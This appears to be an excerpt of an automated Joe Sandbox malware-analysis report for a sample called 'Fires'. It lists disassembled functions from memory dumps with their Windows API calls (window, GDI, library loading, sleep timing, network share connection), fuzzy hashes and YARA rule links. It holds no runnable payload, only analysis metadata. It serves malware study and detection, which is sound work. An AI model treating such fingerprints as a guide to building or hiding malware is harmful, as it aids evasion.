Instruction Fuzzy Hash: 6501F532A01214BBCB206FA5FC05BAA7B6AEF82334F140219F926861E0DF709800C6B1

Function 00D47873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D478B1
GetStockObject.GDI32(00000011), ref: 00D478C5
SendMessageW.USER32(00000000,00000030,00000000), ref: 00D478CF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: c1fbe890817969bcd86afdfad199d7481bb03c53ef2a7e25f07205be10f26f6e
Instruction ID: 1efa0b0a1252722d201f61aeaffc3927a0bedbfba21d2a5d67f867bb4f22e9b0
Opcode Fuzzy Hash: c1fbe890817969bcd86afdfad199d7481bb03c53ef2a7e25f07205be10f26f6e
Instruction Fuzzy Hash: 5E115B72506649BFDF165F949C58EEA7B6DFF08364F090116FA0592120D731DC60EBB0

Function 00D733E6 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,00D7338D,00000364,00000000,00000000,00000000,?,00D735FE,00000006,FlsSetValue), ref: 00D73418
GetLastError.KERNEL32(?,00D7338D,00000364,00000000,00000000,00000000,?,00D735FE,00000006,FlsSetValue,00DE3260,FlsSetValue,00000000,00000364,?,00D731B9), ref: 00D73424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D7338D,00000364,00000000,00000000,00000000,?,00D735FE,00000006,FlsSetValue,00DE3260,FlsSetValue,00000000), ref: 00D73432

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 721532f5d64a763ad10f77ac627acc65817148663540e355a5c8847a9281771e
Instruction ID: 330d2289609e0b75ae80c1b90c4e8fc400010d169c0570240032eca785ca4f4e
Opcode Fuzzy Hash: 721532f5d64a763ad10f77ac627acc65817148663540e355a5c8847a9281771e
Instruction Fuzzy Hash: 9F01F732652326ABCB364F79DC459563B59BF04B657258220F94EE7280E720DD01D6F4

Function 00DABA6F Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DAB69A,?,00008000), ref: 00DABA8B
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DAB69A,?,00008000), ref: 00DABAB0
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00DAB69A,?,00008000), ref: 00DABABA
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DAB69A,?,00008000), ref: 00DABAED

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: a0952287a216ff38e1e2d317c07639b972d48ab2a877f5c54f8bdc5b6a60c235
Instruction ID: a9e876a3182b182b77eb54bafe485dced7eda41e7bdd5997ef09ffdff303a451
Opcode Fuzzy Hash: a0952287a216ff38e1e2d317c07639b972d48ab2a877f5c54f8bdc5b6a60c235
Instruction Fuzzy Hash: 03117C30C01629E7CF009FA5E9486EEBB78FF0A721F110086D941B2241CBB09651CB71

Function 00DD886F Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DD888E
ScreenToClient.USER32(?,?), ref: 00DD88A6
ScreenToClient.USER32(?,?), ref: 00DD88CA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00DD88E5

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 9fff89c816432ecfacbc4b7ea0f4853e8c53e4db9ae0b234ff9ab57d19b79fa1
Instruction ID: 9e4a98b5b19292734569be9c3311aa644dcf58d727ac7b7775fe1f270d49f78e
Opcode Fuzzy Hash: 9fff89c816432ecfacbc4b7ea0f4853e8c53e4db9ae0b234ff9ab57d19b79fa1
Instruction Fuzzy Hash: 34113FB9D0120DAFDB41CFA8D884AEEBBB5FB08310F508166E915E3610D735AA549FA0

Function 00DA36F4 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DA3712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00DA3723
GetCurrentThreadId.KERNEL32 ref: 00DA372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DA3731

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: fbc9c7ad972f196ede6878281fac33e6088e4aa7d902110404093fc614b7968f
Instruction ID: eda08e186a0d96327de0510f81ee5041d2a3b5a15cb70486ed7a97ef326398e2
Opcode Fuzzy Hash: fbc9c7ad972f196ede6878281fac33e6088e4aa7d902110404093fc614b7968f
Instruction Fuzzy Hash: C8E06DB11023287ADA2017A29C4DEEB7F6EDF42BA1F540056F105D2180DAA4C940C2B1

Function 00DD92BF Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00D41F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00D41F87
Part of subcall function 00D41F2D: SelectObject.GDI32(?,00000000), ref: 00D41F96
Part of subcall function 00D41F2D: BeginPath.GDI32(?), ref: 00D41FAD
Part of subcall function 00D41F2D: SelectObject.GDI32(?,00000000), ref: 00D41FD6

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00DD92E3
LineTo.GDI32(?,?,?), ref: 00DD92F0
EndPath.GDI32(?), ref: 00DD9300
StrokePath.GDI32(?), ref: 00DD930E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: f90b7d9a8b2ab478cc8e774beb645427428652c8a664e2898ca9bb7a2f9fef47
Instruction ID: 3c471560bf8b58db80ddeffc33d7cc073918cd4326f1957a49ff29c6f7fea0c1
Opcode Fuzzy Hash: f90b7d9a8b2ab478cc8e774beb645427428652c8a664e2898ca9bb7a2f9fef47
Instruction Fuzzy Hash: E0F05E32006358BBDF125F94AC0EFDE3F5AAF4A320F048102FA15612E1C77555669BB5

Function 00D421A0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00D421BC
SetTextColor.GDI32(?,?), ref: 00D421C6
SetBkMode.GDI32(?,00000001), ref: 00D421D9
GetStockObject.GDI32(00000005), ref: 00D421E1

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 47c76566f12aa7a566c099a0bb695100f5c6c42d8e534a4f074c5416e2541a0c
Instruction ID: 03ee11635c519582a80d89d80b4a18765f4ad51ca8cb9260422865f99d27b8c3
Opcode Fuzzy Hash: 47c76566f12aa7a566c099a0bb695100f5c6c42d8e534a4f074c5416e2541a0c
Instruction Fuzzy Hash: 12E06531241740ABDF215B74BC09BE93B12EB12735F08821AF7B9941E0C77146409B30

Function 00D9EC36 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00D9EC36
GetDC.USER32(00000000), ref: 00D9EC40
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D9EC60
ReleaseDC.USER32(?), ref: 00D9EC81

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 53991fa85e15846f423a7200347a5d8a573784f84c109f45b6cc5ce53100ffb6
Instruction ID: ea15eb2713250391b236f0136258c81f147e33ce738f1d8f95e2b68ff746b7be
Opcode Fuzzy Hash: 53991fa85e15846f423a7200347a5d8a573784f84c109f45b6cc5ce53100ffb6
Instruction Fuzzy Hash: D3E09A75805308EFCF41AFA0D948A6DBBBAFB58311F14845AF94AE3350CB7899419F60

Function 00D9EC4A Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00D9EC4A
GetDC.USER32(00000000), ref: 00D9EC54
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D9EC60
ReleaseDC.USER32(?), ref: 00D9EC81

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 2f3fa7ab1a8d58cb6cace06f7c206145f23459cd7d4efbc7e3df852146981d37
Instruction ID: 4bb05e09c415798e60017d7475311a77b6db68e9c0bab0c744505a07bff5d7b5
Opcode Fuzzy Hash: 2f3fa7ab1a8d58cb6cace06f7c206145f23459cd7d4efbc7e3df852146981d37
Instruction Fuzzy Hash: AAE09A75C05308EFCF519FA0D948A5DBBBAFB58311F14845AF949E3350C77899019F60

Function 00DB57CC Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D441EA: _wcslen.LIBCMT ref: 00D441EF

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DB5919

Strings

*, xrefs: 00DB5855
LPT, xrefs: 00DB5840

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 014dab268f5b501ffb3b6e2bc238a1dcf4704f57ad6e4aeadf7d8c1fbcdccb04
Instruction ID: ea8bcb86bd634b336b1009a13e86632b9fda6d21a8709243d24e24caed369a89
Opcode Fuzzy Hash: 014dab268f5b501ffb3b6e2bc238a1dcf4704f57ad6e4aeadf7d8c1fbcdccb04
Instruction Fuzzy Hash: C8915975A00604DFCB14DF54D494FAABBB1EF49314F198099E84AAB366C731EE85CBA0

Function 00DA5703 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 223comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00DA58AF

Strings

Container, xrefs: 00DA581E
0$, xrefs: 00DA5952

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ContainedObject
String ID: 0$$Container
API String ID: 3565006973-836522788
Opcode ID: 81f92718cad10e3b1b1552eeb0c0dc5a82025dcd13c4199e6ecd9e8c37d97247
Instruction ID: 3e553f0d27cb35b023728830f0106a14bc453531addc81cd6700919d2bd9cac6
Opcode Fuzzy Hash: 81f92718cad10e3b1b1552eeb0c0dc5a82025dcd13c4199e6ecd9e8c37d97247
Instruction Fuzzy Hash: 96813770200601EFDB14DF64C885B6ABBF9FF49710F24856DF94A9B295DBB0E845CB60

Function 00D6E5ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00D6E67D

Strings

pow, xrefs: 00D6E655, 00D6E672

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: a088dd03b71f5c56022e9faecdc83984c50beebf838631eedc9c29aa045c6778
Instruction ID: 0743c255350c4e1c0cbcc4e308606a62481a983500ea05f2ecc01a6a133dbd8d
Opcode Fuzzy Hash: a088dd03b71f5c56022e9faecdc83984c50beebf838631eedc9c29aa045c6778
Instruction Fuzzy Hash: 02519B64E4930287CB117718CD4937A2BA0EB10B00F68CD58F4D9862E9FF358C95AB76

Function 00D5A8EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00D5A916

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: fda36e36ab2c6e0992580439363928979b79711b9ec7f30c36066b1377e0e540
Instruction ID: ff571e08dab705130cd2d091b58a35302661930a88c76cb91797e85815d055ee
Opcode Fuzzy Hash: fda36e36ab2c6e0992580439363928979b79711b9ec7f30c36066b1377e0e540
Instruction Fuzzy Hash: 41514F319042669FCF25DF28C441ABA7BA1EF16710F68415AEC929B280DB30DD86DF71

Function 00D5F6CA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00D5F6DB
GlobalMemoryStatusEx.KERNEL32(?), ref: 00D5F6F4

Strings

@, xrefs: 00D5F6E8

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c83772a9d871caacb8d44f282c684c2afd668a8690bf438b38a7a99d996bb631
Instruction ID: 302111d6dcd24272620cd75058e242de6c8420bb295af74c30c4ec3c6e46130f
Opcode Fuzzy Hash: c83772a9d871caacb8d44f282c684c2afd668a8690bf438b38a7a99d996bb631
Instruction Fuzzy Hash: 11514872408748ABD320AF11DC86BAFBBE8FB95340F81885DF1D9911A1DF708529CB76

Function 00DC61A2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00DC623D
_wcslen.LIBCMT ref: 00DC6249

Strings

CALLARGARRAY, xrefs: 00DC6243, 00DC6248

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: d33c0d70157583bbdf1c9c0290d5d0e4c1595806ff2b8ae1e6cbb9b5b3882e91
Instruction ID: 46a05d5a5e66131eeff3d277dfa8887da0ac0d200ff3b4a18e6d44b4c6c1599e
Opcode Fuzzy Hash: d33c0d70157583bbdf1c9c0290d5d0e4c1595806ff2b8ae1e6cbb9b5b3882e91
Instruction Fuzzy Hash: F0419A71A0021A9FCB00DFA9C881EAEFBB5EF59364F14406DE406A7251EB71D981CBB0

Function 00DD4008 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00DD40BD
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DD40F8

Strings

static, xrefs: 00DD4058

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 7e886d7711e8aadbf2d1d0f484dc161724bcf5ea39bf40c8ab22acba6b904b66
Instruction ID: 56b30770c6674d1d570d01ca095e57ee7d6149a84acd2f139789eac09b39f0ea
Opcode Fuzzy Hash: 7e886d7711e8aadbf2d1d0f484dc161724bcf5ea39bf40c8ab22acba6b904b66
Instruction Fuzzy Hash: 54316D71110604AFDB249F68CC80BFB77A9FF48724F04861AFAA597290DA71AC85DB70

Function 00DD4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DD50BD
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DD50D2

Strings

', xrefs: 00DD502C

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: b427ded9251e8e5f0d07238fa22e561b1e6f4fe40dae5cce9bdee26d68ab7d0d
Instruction ID: 63161052966e6813cb9418a2d5a1c7773b30b9de755ab13c9712e1a03642b1ea
Opcode Fuzzy Hash: b427ded9251e8e5f0d07238fa22e561b1e6f4fe40dae5cce9bdee26d68ab7d0d
Instruction Fuzzy Hash: 2C315974A0170A9FDB14CFA9D880BEEBBB5FF49300F14406AE904AB395D771A955CFA0

Function 00D420B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 00D4249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00D424B0

Part of subcall function 00D42234: GetWindowLongW.USER32(?,000000EB), ref: 00D42242

GetParent.USER32(?), ref: 00D83440
DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 00D834CA

Strings

(, xrefs: 00D420B9

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: LongWindow$ParentProc
String ID: (
API String ID: 2181805148-2063206799
Opcode ID: 1e9942df3d10d55b54f7a883ed172b0c6ba77f166ea1b3a3993f22af89828ea6
Instruction ID: 1306c6f91b8c231186bbd11e5cc9bbb51c3624a4477f510283f34477feefc756
Opcode Fuzzy Hash: 1e9942df3d10d55b54f7a883ed172b0c6ba77f166ea1b3a3993f22af89828ea6
